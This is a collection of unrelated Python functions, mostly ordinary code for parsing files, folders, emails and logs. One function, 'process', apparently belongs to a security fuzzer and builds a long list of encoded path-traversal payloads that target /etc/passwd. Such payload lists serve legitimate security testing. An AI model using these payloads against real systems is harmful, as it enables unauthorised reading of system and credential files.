re.compile(regex_ACCfolder)\n obsdirinfo_m = dirpat.match(cvcfoldername)\n if obsdirinfo_m is None:\n print(\"Cal error\")\n raise ValueError(\n \"Calibration directory does not have correct syntax.\")\n obsdirinfo = obsdirinfo_m.groupdict()\n obsfolderinfo['stnid'] = obsdirinfo['stnid']\n d0 = datetime.datetime(int(obsdirinfo['year']),\n int(obsdirinfo['month']),\n int(obsdirinfo['day']),\n int(obsdirinfo['hour']),\n int(obsdirinfo['minute']),\n int(obsdirinfo['second']))\n obsfolderinfo['sessiontimeid'] = d0\n obsfolderinfo['rcumode'] = obsdirinfo['rcumode']\n obsfolderinfo['subband'] = '0:511'\n obsfolderinfo['integration'] = 1.0\n obsfolderinfo['duration_tot'] = int(obsdirinfo['duration_tot'])\n obsfolderinfo['source'] = obsdirinfo['calsrc']\n obsfolderinfo['pointing'] = \\\n ilisa.monitorcontrol.directions.std_pointings(\n obsfolderinfo['source'])\n else:\n raise ValueError(\"Folder not expected xst or acc format.\")\n obsfolderinfo['datatype'] = cvcextstr\n return obsfolderinfo", "def folder_traverse(base, message_data, pst_name, folder_name):\n for folder in base.sub_folders:\n if folder.number_of_sub_folders:\n message_data = folder_traverse(folder, message_data, pst_name, folder.name)\n message_data = check_for_messages(folder, message_data, pst_name, folder.name)\n return message_data", "def read_campaign(root_import_path):\n if os.path.isfile(os.path.join(root_import_path, campaign_filename)):\n # any missing **required** fields will make this false. spawns MISSING error. Fatal.\n #is_complete = True\n\n # any missing data will make this false. spawns a warning.\n #is_minally_ok = True\n\n # True if something wierd happens\n is_broken = False # True if something wierd happens. Fatal\n\n version = ''\n name = ''\n description_text = ''\n assoc_researchers_text = ''\n assoc_publications_text = ''\n assoc_research_grants_text = ''\n start_date_text = ''\n end_date_text = ''\n contact_person_text = ''\n\n f = open(os.path.join(root_import_path, campaign_filename))\n\n for line in f.readlines():\n\n split_string = line.rstrip().split(':')\n\n if split_string[0].lower() == 'Version'.lower():\n version = split_string[1]\n elif split_string[0].lower() == 'Name'.lower():\n name = split_string[1]\n elif split_string[0].lower() == 'Description'.lower():\n description_text = split_string[1]\n elif split_string[0].lower() == 'Associated Researchers'.lower():\n assoc_researchers_text = split_string[1]\n elif split_string[0].lower() == 'Associated Publications'.lower():\n assoc_publications_text = split_string[1]\n elif split_string[0].lower() == 'Associated Research Grants'.lower():\n assoc_research_grants_text = split_string[1]\n elif split_string[0].lower() == 'Start Date'.lower():\n start_date_text = split_string[1]\n elif split_string[0].lower() == 'End Date'.lower():\n end_date_text = split_string[1]\n elif split_string[0].lower() == 'Contact Person'.lower():\n contact_person_text = split_string[1]\n else:\n print 'ERROR: Unknown label in campaign file;', split_string[0]\n is_broken = True\n\n campaign_data = dict(#version=version,\n short_name=name,\n description=description_text,\n associated_researchers=assoc_researchers_text,\n associated_publications=assoc_publications_text,\n associated_research_grant=assoc_research_grants_text,\n date_start=start_date_text.strip(),\n date_end=end_date_text.strip(),\n contact_person=contact_person_text)\n return campaign_data\n\n else:\n print \"ERROR: Can not open the campaign.txt file.\"\n\n return False", "def parse_util_file(file_data):\n if isinstance(file_data, dict):\n if 'from' not in file_data:\n return {'from': file_data['to'], 'to': file_data['to']}\n if 'to' not in file_data:\n return {'from': file_data['from'], 'to': file_data['from']}\n\n return file_data\n\n else:\n parts = file_data.split(' ')\n if len(parts) == 1:\n return {'from': file_data, 'to': file_data}\n else:\n return {'from': parts[0], 'to': parts[1]}", "def get_files(message_filters=None, conversation_filters=None):\n\twith open(constants.CONVERSATION_DATA_FILENAME, 'r') as the_file:\n\t\tconversation_data = parse_file(the_file, filters=conversation_filters)\n\n\twith open(constants.MESSAGE_DATA_FILENAME, 'r') as the_file:\n\t\tmessage_data = parse_file(the_file, filters=message_filters)\n\n\treturn conversation_data, message_data", "def get_parsed_data():\n\n echonest_data_files = [f for f in os.listdir('.') if re.match(\"^echonest_[\\w]+.txt$\", f)]\n\n # Setting up header with user id and attributes\n header = ['user_id']\n header.extend(ATTRIBUTES)\n\n # printing header to standard out\n print \",\".join(header) \n\n # Processing each file to obtain parsed data\n for data_file in echonest_data_files:\n user_id = data_file[9:-4] # strip file prefix/suffix to get username/id\n parse_echonest_data_file(data_file, user_id)", "def parse_folder(self, path):\n\n for filename in os.listdir(path):\n self.parse_file(os.path.join(path, filename), filename)\n return self.country_dict, self.hre_dict, self.name_dict", "def _parse_filelist(self):\n if not os.path.exists(self.filelist):\n print \"couldn't find \",self.filelist\n return\n\n f = open( self.filelist, 'r' )\n flist = f.readlines()\n self.larlitefilelist = []\n for f in flist:\n if \".root\" in f:\n self.larlitefilelist.append( f.strip() )", "def _ExtractEmailAddressesFromOWNERS(path, depth=0):\n # It is unlikely that any chain of OWNERS files will exceed 10 redirections\n # via file:// directives.\n limit = 10\n if (depth > limit):\n raise Error('_ExtractEmailAddressesFromOWNERS has been called {} times. The'\n ' path {} may be part of an OWNERS loop.'.format(limit, path))\n\n directive = 'file://'\n email_pattern = re.compile(_EMAIL_PATTERN)\n extracted_emails = []\n\n with open(path, 'r') as owners_file:\n for line in [line.lstrip()\n for line in owners_file.read().splitlines() if line]:\n index = line.find(' ')\n first_word = line[:index] if index != -1 else line\n\n if email_pattern.match(first_word):\n extracted_emails.append(first_word)\n\n elif first_word.startswith(directive):\n next_path = _GetOwnersFilePath(\n os.path.join(SRC, first_word[len(directive):]))\n\n if os.path.exists(next_path) and os.path.isfile(next_path):\n extracted_emails.extend(\n _ExtractEmailAddressesFromOWNERS(next_path, depth + 1))\n else:\n raise Error('The path derived from {} does not exist. '\n 'Derived path: {}'.format(first_word, next_path))\n\n return extracted_emails", "def makeDataFileFromEmails( dir_path, out_file_path ):\n\n\twith open( out_file_path, 'w' ) as out_file:\n\n\t\t# Iterate over the files in directory 'path'\n\t\tfor file_name in os.listdir( dir_path ):\n\n\t\t\t# Open each file for reading\n\t\t\twith open( dir_path + file_name ) as in_file:\n\n\t\t\t\t# Reformat emails as a single line of text\n\t\t\t\ttext = in_file.read().replace( '\\n',' ' ).replace( '\\r', ' ' )\n\t\t\t\ttext = text + \"\\n\"\n\t\t\t\t# Write each email out to a single file\n\t\t\t\tout_file.write( text )", "def get_folder_contact_output(contact_id: Optional[pulumi.Input[str]] = None,\n folder_id: Optional[pulumi.Input[str]] = None,\n opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetFolderContactResult]:\n ...", "def _parse_data_dir(self, data_dir):\n categories = os.listdir(data_dir)\n for folder_name in categories:\n all_fnames_list_fname = os.path.join(data_dir, folder_name,\n folder_name + \".bmf\")\n if not os.path.isfile(all_fnames_list_fname):\n raise IOError(\"Not found file {}\".format(all_fnames_list_fname))\n all_fnames_list = np.loadtxt(all_fnames_list_fname, dtype=np.str,\n skiprows=1)\n # Correct from pgm to jpg\n all_fnames_list = [f.split('.')[0]+'.jpg' for f in all_fnames_list]\n\n all_fnames_list = [os.path.join(data_dir, folder_name, f) for f \\\n in all_fnames_list]\n\n self.samples += len(all_fnames_list)\n # Append the last\n self.image_filenames.append(all_fnames_list)", "def _findFiles(self, inputfolder):\n protofile, caffemodel = None, None\n files = os.listdir(inputfolder)\n for f in files:\n name, ext = splitext(f)\n if ext == '.caffemodel':\n caffemodel = join(inputfolder, f)\n elif f == 'deploy.prototxt':\n protofile = join(inputfolder, f)\n return protofile, caffemodel", "def read_folder(self,sourceFolder):\n \n taskList = []\n for fileName in os.listdir(sourceFolder):\n if fileName.endswith(\".task\"):\n if 'HFODomain' in sourceFolder:\n taskList.append(HFOTask(sourceFolder+fileName,fileName.split('.')[0]))\n else:\n taskList.append(GridWorldTask(sourceFolder+fileName,fileName.split('.')[0]))\n return taskList", "def parse_folder(self, path):\n\n data = []\n for filename in os.listdir(path):\n data.append(self.parse_file(os.path.join(path, filename), filename))\n return data", "def userMessages(self, path, pattern):\n log(logging.DEBUG, \"Look for files at \" + path + \" with pattern \" + pattern)\n # if folder does not exist\n if not os.path.exists(path):\n return []\n # result message list\n message_list = []\n # retrieve file names\n try:\n for filename in os.listdir(path):\n log(logging.DEBUG, \"\\tFound file \" + filename)\n # only adds if name has the corresponding pattern\n if re.match(pattern, filename):\n message_list.append(filename)\n except:\n logging.exception(\"Error while listing messages in directory \" + path)\n\n messages_to_send = []\n for msg_id in message_list:\n cert = self.users[self.retrieveUserUuidFromMsgId(msg_id)]['description']['data']['certificate']\n subject_info = self.card_utils.get_certificate_subject_info(certificate_pem=cert)\n messages_to_send.append({\n 'cc_number' : subject_info['cc_number'],\n 'complete_name' : subject_info['complete_name'],\n 'msg_id' : msg_id\n })\n return messages_to_send", "def get_company_files(target_dcns):\n # directory = r\".\\PDFParsing\\parsed_files\"\n directory = r\".\\PDFParsing\\clean_txt_flat\"\n files = []\n temp = os.path.join(directory)\n list_files = os.listdir(temp)\n for item in list_files:\n l = item.split(\"-\")\n dcn = l[-1].rstrip(\".txt\").rstrip(\"(1)\")\n while dcn and not dcn[-1].isdigit():\n dcn = dcn[:-1]\n while dcn and not dcn[0].isdigit():\n dcn = dcn[1:]\n if dcn:\n dcn = int(dcn)\n else:\n continue\n if dcn in target_dcns:\n files.append((os.path.join(temp, item), dcn))\n return files", "def _counterparty(\n file_name: str,\n cp_name: str\n ) -> Tuple[str, List[str]]:\n with open(file_name, encoding='utf-8') as f:\n dct = json.load(f)\n root_dir = dct.pop('root_dir')\n item = dct.pop(cp_name)\n return root_dir + item['path'], item['to']", "def create_folder_structure(_user):\n flds = _user.folders\n logging.info(f\"\\nYou have ** {str(len(_user.folders))} ** \"\n f\"folders in your ArcGIS Organization\\n\")\n # listing documents in the user root folder\n root_folder_items = _user.items()\n _n = 0\n logging.info(f\"Total number of items in root folder: {str(len(root_folder_items))}\")\n\n # list of supported file types to retrieve from the user folders\n # TODO Read file_types from a external file or directly form a public Esri URL\n file_types = ['CSV', 'Service Definition', 'KML', 'ZIP', 'Shapefile',\n 'Image Collection', 'PDF', 'Microsoft Excel']\n\n # Listing & downloading items in the root folder\n for root_folder_item in root_folder_items:\n if root_folder_item.type in file_types:\n _n += 1\n item_path = str(root_folder_item.download())\n file_extension = item_path.rsplit(\".\", maxsplit=1)[1]\n file_destination = os.path.normpath(\"\".join([ARCGISBOXDIR, '/',\n root_folder_item.title,\n \".\", file_extension]))\n os.rename(str(item_path), file_destination)\n logging.info(f\"{root_folder_item.title}\\t\\t({root_folder_item.type})\\n\")\n\n # Listing documents inside other user folders\n for fld in flds:\n # logging.info((carpeta))\n logging.info(f\"Name: {fld['title']}\\n\")\n os.mkdir(os.path.normpath(\"\".join([ARCGISBOXDIR, \"/\", fld['title']])))\n flds = _user.items(folder=fld['title'])\n logging.info(f'You have {format(str(len(flds)))} items inside your folder\\n')\n for i in flds:\n if i.type in file_types:\n _n += 1\n item_path = str(i.download())\n file_extension = item_path.rsplit(\".\", maxsplit=1)[1]\n file_destination = os.path.normpath(\"\".join([ARCGISBOXDIR, \"/\",\n fld['title'], \"/\", i.title,\n \".\", file_extension]))\n logging.info(file_destination)\n os.rename(str(item_path), file_destination)\n logging.info(f\"\\t\\t {i.title} \\t\\t( {i.type} )\\n\")\n\n logging.info(f\"\\tDownloadable elements:\\t {str(_n)}\")", "def mergeFolders():\n\n result, data = mailBox.list()\n if result != \"OK\":\n print \"\\nERROR: Could not get list of folders in mailbox\\n\"\n print \"\\n* Exiting... *\\n\"\n sys.exit(1)\n\n folderList = []\n print \"\\nList of folders:\"\n print \"---------------------\"\n for item in data:\n folderName = item.split()[-1].replace(\"\\\"\", \"\")\n if not \"Gmail\" in folderName:\n folderList.append(folderName)\n print folderName\n\n srcFolder = str(raw_input(\"\\nEnter source folder name EXACTLY: \"))\n if srcFolder not in folderList:\n print \"\\nERROR: Incorrect source folder name\\n\"\n print \"\\n* Exiting... *\\n\"\n destFolder = str(raw_input(\"\\nEnter destination folder name: \"))\n if destFolder not in folderList:\n print \"\\nERROR: Incorrect destination folder name\\n\"\n print \"\\n* Exiting... *\\n\"\n\n uidList = search(srcFolder)\n\n result1 = \"\"\n result2 = \"\"\n flag1 = True\n flag2 = True\n result, data = mailBox.select(srcFolder, False)\n\n for item in uidList.split(\",\"):\n\n result1, data = mailBox.uid('COPY', item, destFolder)\n if result1 == \"OK\":\n result2 = delete(item, srcFolder, \"f\")\n\n if result1 != \"OK\":\n flag1 = False\n if result2 != \"OK\":\n flag2 = False\n\n if flag1 == flag2 == True:\n print \"\\n* Merge successful *\\n\"\n else:\n if flag1 == False:\n print \"\\nERROR: Could not copy to %s while merging folders\\n\" % destFolder\n if flag2 != False:\n print \"\\nERROR: Could not delete message from source folder %s\\n\" % srcFolder", "def parse_main_folder_name(main_folder_name):\n parts = main_folder_name.split('_')\n\n date = parts[0]\n raft_geometry = parts[1]\n thin_film_prop = parts[2]\n magnet_field_prop = parts[3]\n\n if len(parts) > 4:\n comments = parts[4]\n else:\n comments = 'none'\n\n return date, raft_geometry, thin_film_prop, magnet_field_prop, comments", "def get_recipients(item_container):\n if item_container.item.string_1 != '':\n user_folder = get_item_container_by_path(item_container.item.string_1)\n return get_all_users_with_email(user_folder)\n else:\n while not check_userfolder(item_container):\n item_container = item_container.get_parent()\n return get_all_users_with_email(item_container)", "def process_file(path):\r\n\ttokenset = {}\r\n\r\n\tfp = open(path, 'r')\r\n\temailMsg = email.message_from_file(fp)\r\n\tfp.close()\r\n\r\n\ttokenset = parse_body(emailMsg.get_payload().lower())\r\n\r\n\treturn tokenset", "def getFileData(self, context, manifest, filedata):\n files = context.source.listFiles()\n for fn in files:\n if 'dat' == fn.split('.')[-1]:\n data = context.source.readFile(fn)\n doc = parseDoc(data)\n root = doc.getRootElement()\n if 'CONTENT' == root.name:\n id = fn.split('.')[0]\n docfn = id + '.html'\n data = context.performTransform(data, ['Blackboard Content', 'Blackboard_content_import_xform.xsl'])\n data = data.replace('@X@EmbeddedFile.location@X@', '%s/embedded/' %id)\n filedata[docfn] = data.replace('@X@LOCALFOLDERLOCATION@X@', '%s/' %id)", "def take_action(self, parsed_args):\n folder_content = dict()\n parent = utils.key_len(parsed_args.parent)\n folder_content = self.app.metagen.directory_list(parent)\n content_type_map = {\n '1': 'Folder',\n '2': 'Sample',\n '3': 'MRSA Sample',\n '4': 'Listeria Sample'\n }\n header = ['type', 'name', 'id', 'status', 'size', 'created']\n if folder_content:\n if not folder_content['items']:\n self.logger.info('\\nFolder {} (id: {}) is empty'.format(folder_content['name'], parent))\n for_output = [[' ', ' ', ' ', ' ', ' ', ' ']]\n return (header, for_output)\n else:\n raise Exception(\"Exception uccured.\")\n\n def _set_date(inp):\n return dt.fromtimestamp((inp[1]/1000)).strftime('%Y-%m-%d %H:%M:%S')\n\n def _del_none(inp):\n out = [inp[1]]\n if not out[0]:\n out = [0 if v[1] == 'int' else '-' for k, v in field_maps.items() if inp[0] == v[0]]\n return out[0]\n\n def _set_dim(inp):\n out = inp if inp else 0\n out = utils.convert_size(out)\n return out if out is not '0B' else '-'\n\n def _set_type(inp):\n ctype = content_type_map[str(inp[1])] if content_type_map.get(str(inp[1])) else inp[1]\n return ctype\n\n def _convert(inp):\n for item in inp.items():\n for k, v in field_maps.items():\n if item[0] == v[0]:\n inp[item[0]] = field_maps[k][2](item)\n break\n return inp\n\n field_maps = {\n 'type': ['content_type', 'str', _set_type],\n 'id': ['id', 'str', _del_none],\n 'name': ['name', 'str', _del_none],\n 'status': ['status', 'str', _del_none],\n 'size': ['size', 'int', _del_none],\n 'created': ['created', 'int', _set_date]\n }\n\n \"\"\"we need just items for output\"\"\"\n items_data = [_convert(item) for item in folder_content['items']]\n\n \"\"\"order regarding order parameters\"\"\"\n if parsed_args.order:\n if parsed_args.order.lower() in header:\n items_data = sorted(items_data,\n key=itemgetter(field_maps[parsed_args.order.lower()][0]),\n reverse=(not parsed_args.up)\n )\n for_output = [[item[field_maps[f][0]] if f is not 'size'\n else _set_dim(item[field_maps[f][0]])\n for f in header]\n for item in items_data\n ]\n self.logger.info('\\nContent of the Folder {} (id: {})'.format(folder_content['name'], parent))\n return (header, for_output)", "def _read_file_data(self, message_name_filter_list, read_until=None):\n\n if read_until is None:\n read_until = 1 << 50 # make it larger than any possible log file\n\n try:\n # pre-init reusable objects\n header = self._MessageHeader()\n msg_data = self._MessageData()\n\n curr_file_pos = self._file_handle.tell()\n\n while True:\n data = self._file_handle.read(3)\n curr_file_pos += len(data)\n header.initialize(data)\n data = self._file_handle.read(header.msg_size)\n curr_file_pos += len(data)\n if len(data) < header.msg_size:\n break # less data than expected. File is most likely cut\n\n if curr_file_pos > read_until:\n if self._debug:\n print('read until offset=%i done, current pos=%i' %\n (read_until, curr_file_pos))\n break\n\n try:\n if header.msg_type == self.MSG_TYPE_INFO:\n msg_info = self._MessageInfo(data, header)\n self._msg_info_dict[msg_info.key] = msg_info.value\n self._msg_info_dict_types[msg_info.key] = msg_info.type\n elif header.msg_type == self.MSG_TYPE_INFO_MULTIPLE:\n msg_info = self._MessageInfo(data, header, is_info_multiple=True)\n self._add_message_info_multiple(msg_info)\n elif header.msg_type == self.MSG_TYPE_PARAMETER:\n msg_info = self._MessageInfo(data, header)\n self._changed_parameters.append((self._last_timestamp,\n msg_info.key, msg_info.value))\n elif header.msg_type == self.MSG_TYPE_PARAMETER_DEFAULT:\n msg_param = self._MessageParameterDefault(data, header)\n self._add_parameter_default(msg_param)\n elif header.msg_type == self.MSG_TYPE_ADD_LOGGED_MSG:\n msg_add_logged = self._MessageAddLogged(data, header,\n self._message_formats)\n if (message_name_filter_list is None or\n msg_add_logged.message_name in message_name_filter_list):\n self._subscriptions[msg_add_logged.msg_id] = msg_add_logged\n else:\n self._filtered_message_ids.add(msg_add_logged.msg_id)\n elif header.msg_type == self.MSG_TYPE_LOGGING:\n msg_logging = self.MessageLogging(data, header)\n self._logged_messages.append(msg_logging)\n elif header.msg_type == self.MSG_TYPE_LOGGING_TAGGED:\n msg_log_tagged = self.MessageLoggingTagged(data, header)\n if msg_log_tagged.tag in self._logged_messages_tagged:\n self._logged_messages_tagged[msg_log_tagged.tag].append(msg_log_tagged)\n else:\n self._logged_messages_tagged[msg_log_tagged.tag] = [msg_log_tagged]\n elif header.msg_type == self.MSG_TYPE_DATA:\n msg_data.initialize(data, header, self._subscriptions, self)\n if msg_data.timestamp != 0 and msg_data.timestamp > self._last_timestamp:\n self._last_timestamp = msg_data.timestamp\n elif header.msg_type == self.MSG_TYPE_DROPOUT:\n msg_dropout = self.MessageDropout(data, header,\n self._last_timestamp)\n self._dropouts.append(msg_dropout)\n elif header.msg_type == self.MSG_TYPE_SYNC:\n self._sync_seq_cnt = self._sync_seq_cnt + 1\n else:\n if self._debug:\n print('_read_file_data: unknown message type: %i (%s)' %\n (header.msg_type, chr(header.msg_type)))\n print('file position: %i msg size: %i' % (\n curr_file_pos, header.msg_size))\n\n if self._check_packet_corruption(header):\n # seek back to advance only by a single byte instead of\n # skipping the message\n curr_file_pos = self._file_handle.seek(-2-header.msg_size, 1)\n\n # try recovery with sync sequence in case of unknown msg_type\n if self._has_sync:\n self._find_sync()\n else:\n # seek back msg_size to look for sync sequence in payload\n if self._has_sync:\n self._find_sync(header.msg_size)\n\n except IndexError:\n if not self._file_corrupt:\n print(\"File corruption detected while reading file data!\")\n self._file_corrupt = True\n\n except struct.error:\n pass #we read past the end of the file\n\n # convert into final representation\n while self._subscriptions:\n _, value = self._subscriptions.popitem()\n if len(value.buffer) > 0: # only add if we have data\n data_item = ULog.Data(value)\n self._data_list.append(data_item)\n # Sorting is necessary to be able to compare two ULogs correctly\n self.data_list.sort(key=lambda ds: (ds.name, ds.multi_id))", "def parse_bro_smtp(smtp_path, target_dir, prefix='smtp'):\n\n # the current message we're parsing in the case of multiple emails coming in over the same connection\n smtp_message_index = 0 \n\n with open(smtp_path, 'r', errors='ignore') as fp:\n source_ipv4 = None\n source_port = None\n envelope_from = None\n envelope_to = []\n\n # state flag for when the data isn't quite right (see below)\n _bypass_read = False\n\n # the first line of the file has the source IP address of the smtp connection\n # in the following format: 172.16.139.143:38668/tcp\n\n line = fp.readline()\n m = REGEX_BRO_SMTP_SOURCE_IPV4.match(line)\n\n if not m:\n logging.error(f\"unable to parse soure address from {smtp_path} ({line.strip()})\")\n event_time = saq.LOCAL_TIMEZONE.localize(datetime.datetime.fromtimestamp(os.path.getmtime(smtp_path)))\n # in this case we skip the first readline() call since we've already read it\n _bypass_read = True\n else:\n source_ipv4 = m.group(1)\n source_port = m.group(2)\n\n logging.debug(f\"got source ipv4 {source_ipv4} port {source_port} for {smtp_path}\")\n\n # the second line is the time (in epoch UTC) that bro received the file\n line = fp.readline()\n event_time = datetime.datetime.utcfromtimestamp(int(line.strip()))\n logging.debug(f\"got event time {event_time} for {smtp_path}\")\n\n STATE_SMTP = 1\n STATE_DATA = 2\n\n state = STATE_SMTP\n rfc822_path = None\n rfc822_fp = None\n\n def _reset_state():\n nonlocal rfc822_fp, source_ipv4, source_port, envelope_from, envelope_to, state\n rfc822_fp = None\n #source_ipv4 = None\n #source_port = None\n envelope_from = None\n envelope_to = []\n state = STATE_SMTP\n\n def _finalize():\n # called when we detect the end of an SMTP stream OR the end of the file (data)\n nonlocal rfc822_fp, source_ipv4, source_port, envelope_from, envelope_to, state\n rfc822_fp.close()\n logging.info(\"finished parsing {} from {}\".format(rfc822_path, smtp_path))\n result = RFC822Email(\n source_ipv4=source_ipv4,\n source_port=source_port,\n envelope_from=envelope_from,\n envelope_to=envelope_to,\n received=event_time,\n file_path=rfc822_path)\n _reset_state()\n return result\n\n # smtp is pretty much line oriented\n while True:\n\n # if we read the first line and it wasn't what we expected\n # then we skip reading it here since we already have it\n if _bypass_read:\n _bypass_read = False\n else:\n line = fp.readline()\n\n if line == '':\n break\n\n if state == STATE_SMTP:\n m = REGEX_BRO_SMTP_MAIL_FROM.match(line)\n if m:\n envelope_from = m.group(1)\n logging.debug(\"got envelope_from {} for {}\".format(envelope_from, smtp_path))\n continue\n\n m = REGEX_BRO_SMTP_RCPT_TO.match(line)\n if m:\n envelope_to.append(m.group(1))\n logging.debug(\"got envelope_to {} for {}\".format(envelope_to, smtp_path))\n continue\n\n m = REGEX_BRO_SMTP_DATA.match(line)\n if m or (not line.startswith('<') and not line.startswith('>')):\n state = STATE_DATA\n rfc822_path = os.path.join(target_dir, f'{prefix}.{smtp_message_index}.email.rfc822')\n smtp_message_index += 1\n rfc822_fp = open(rfc822_path, 'w')\n logging.debug(\"created {} for {}\".format(rfc822_path, smtp_path))\n continue\n\n m = REGEX_BRO_SMTP_RSET.match(line)\n if m:\n logging.debug(f\"detected RSET for {smtp_path}\")\n _reset_state()\n continue\n\n # any other command we skip\n logging.debug(f\"skipping SMTP command {line.strip()}\")\n continue\n\n # otherwise we're reading DATA and looking for the end of that\n if line.strip() == ('> . .'):\n yield _finalize()\n continue\n\n rfc822_fp.write(line)\n continue\n\n # did the file end while we were reading SMTP data?\n if state == STATE_DATA:\n yield _finalize()", "def get_contacts(filename):\n \n \n emails = []\n with open(filename, mode='r') as contacts_file:\n for a_contact in contacts_file:\n\n emails.append(a_contact.split()[0])\n return emails", "def process(self, incomings):\n\n payloads = []\n\n payloads.append([\"../../../../../../../../var/www/attacker.com/public_html/\", \"image.jpg\"])\n payloads.append([\"L2V0Yy9wYXNzd2Q=\"])\n payloads.append([\"TDJWMFl5OXdZWE56ZDJRPQ%3D%3D\"])\n\n #Contains the various types of directory pathing\n #%2f = / || %2e = . || %252f = / || '%255c' = \\\n list_of_postfix_1 = ['/etc','/etc/', '/etc/passwd', '%2fetc%2fpasswd','/etc/passwd%00index.html', '/etc/passwd;index.html','//etc//passwd','L2V0Yy9wYXNzd2Q%3D']\n list_of_prefix = ['../','..././','./../','.../','..../','...//','....\\\\/','..../\\\\\\\\']\n\n #Print just the postfix\n for post_style in list_of_postfix_1:\n payloads.append([post_style])\n\n #New Postfix array (Without the last '/')\n list_of_postfix = ['','etc/passwd']\n\n #For extended file paths (Non-encoded)\n for post_style in list_of_postfix:\n for pre_style in list_of_prefix:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n #Start from longest path\n payloads.append([curr_file_path])\n\n #For extended file paths (Double-slashed)\n list_of_postfix_doubleslash = ['','etc//passwd']\n list_of_prefix_doubleslash = ['..//']\n\n for post_style in list_of_postfix_doubleslash:\n for pre_style in list_of_prefix_doubleslash:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n #Start from longest path\n payloads.append([curr_file_path])\n\n #For extended file paths (Encoded)\n list_of_postfix_encoded = ['','etc%2fpasswd']\n list_of_prefix_encoded = ['%2e%2e%2f']\n\n for post_style in list_of_postfix_encoded:\n for pre_style in list_of_prefix_encoded:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n #Start from longest path\n payloads.append([curr_file_path])\n\n #For extended file paths (Doubly-encoded)\n list_of_postfix_d_encoded = ['','etc%252fpasswd']\n list_of_prefix_d_encoded = ['%252e%252e%252f']\n\n for post_style in list_of_postfix_d_encoded:\n for pre_style in list_of_prefix_d_encoded:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n #Start from longest path\n payloads.append([curr_file_path])\n\n #For extended file paths (Other UTF-8)\n list_of_postfix_utf8_encoded = ['','etc%25c0%25afpasswd']\n list_of_prefix_utf8_encoded = ['%25c0%25ae%25c0%25ae%25c0%25af']\n\n for post_style in list_of_postfix_utf8_encoded:\n for pre_style in list_of_prefix_utf8_encoded:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n #Start from longest path\n payloads.append([curr_file_path])\n\n #For extended file paths (Other UTF-8) 2\n list_of_postfix_utf8_encoded2 = ['','etc%c0%afpasswd']\n list_of_prefix_utf8_encoded2 = ['%c0%ae%c0%ae%c0%af']\n\n for post_style in list_of_postfix_utf8_encoded2:\n for pre_style in list_of_prefix_utf8_encoded2:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n #Start from longest path\n payloads.append([curr_file_path])\n\n # For extended file paths (Other UTF-8) 3\n '''\n list_of_postfix_utf8_encoded3 = ['','etc%u2215passwd']\n list_of_prefix_utf8_encoded3 = ['%uff0e%uff0e%u2215']\n\n for post_style in list_of_postfix_utf8_encoded3:\n for pre_style in list_of_prefix_utf8_encoded3:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n #Start from longest path\n payloads.append([curr_file_path])\n '''\n\n #For extended file paths (Other UTF-8) 4\n list_of_postfix_utf8_encoded4 = ['','etc%c0%2fpasswd']\n list_of_prefix_utf8_encoded4 = ['%c0%2e%c0%2e%c0%2f']\n\n for post_style in list_of_postfix_utf8_encoded4:\n for pre_style in list_of_prefix_utf8_encoded4:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n #Start from longest path\n payloads.append([curr_file_path])\n\n #For extended file paths (Other UTF-8) 5\n list_of_postfix_utf8_encoded5 = ['','etc%uEFC8passwd']\n list_of_prefix_utf8_encoded5 = ['..%uEFC8']\n\n for post_style in list_of_postfix_utf8_encoded5:\n for pre_style in list_of_prefix_utf8_encoded5:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n #Start from longest path\n payloads.append([curr_file_path])\n\n #For extended file paths (Hex)\n list_of_postfix_hex = ['']\n list_of_prefix_hex = ['0x2e0x2e0x2f']\n\n for post_style in list_of_postfix_hex:\n for pre_style in list_of_prefix_hex:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n #Start from longest path\n payloads.append([curr_file_path])\n\n #2-part Inputs\n list_of_second_input = ['passwd']\n\n #Do it with postfix_1 first\n for post_style in list_of_postfix_1:\n for second_input in list_of_second_input:\n payloads.append([post_style, second_input])\n\n #New Postfix array (Without the last '/')\n list_of_postfix_2 = ['etc','etc/']\n\n for second_input in list_of_second_input:\n for post_style in list_of_postfix_2:\n for pre_style in list_of_prefix:\n curr_file_path = post_style;\n for times in range(0,15):\n curr_file_path = pre_style + curr_file_path;\n payloads.append([curr_file_path, second_input])\n\n return payloads", "def parse_folder(self, path):\n\n for filename in os.listdir(path):\n self.parse_file(os.path.join(path, filename), filename)\n return self.relations", "def try_fetch_local(input_data, bare_chan, time_range=None):\n for each_path in pyfusion.config.get('global', 'localdatapath').split('+'):\n # check for multi value shot number, e.g. utc bounds for W7-X data\n shot = input_data.shot\n # MDSplus style path to access sorted files into folders by shot\n path, patt = os.path.split(each_path)\n # print(patt)\n # Detect a a subdir code based on date/shot - half the chars are ~\n if len(patt) == 2*len(patt.replace('~','')): \n subdir = ''\n # Use the YYYYMMDD part if two components\n strshot = str(shot[0]) if len(np.shape(shot))>0 else str(shot)\n # print(strshot, patt, str(shot))\n if len(np.shape(shot)) == 0 and int(strshot[2:4]) <16:\n print(\"*******Warning {strshot} seems like an MDSplus shot or MDS test shot in YYMMDD form - see line 255\"\n .format(strshot=strshot))\n # reverse the order of both the pattern and the shot so 'a' posn is 0th char\n revshot = strshot[::-1]\n for i,ch in enumerate(patt):\n if (i%2) == 0: \n if ch != '~':\n raise LookupError(\"Can't parse {d} as a MDS style subdir\"\n .format(d=patt))\n continue\n if (ord(ch) - ord('a')) < len(revshot):\n subdir += revshot[ord(ch) - ord('a')]\n else:\n if pyfusion.VERBOSE>0:\n print('********** Are we working with MDSplus W7M test shot??? - \\n need a W7M test shot to check if this is really and error', shot)\n\n else:\n subdir = patt\n debug_(pyfusion.DEBUG, 4, key='MDSPlus style subdir ~path', msg=each_path)\n each_path = os.path.join(path, subdir)\n # implement shot[1] < 1 for MDSplus test shots - the 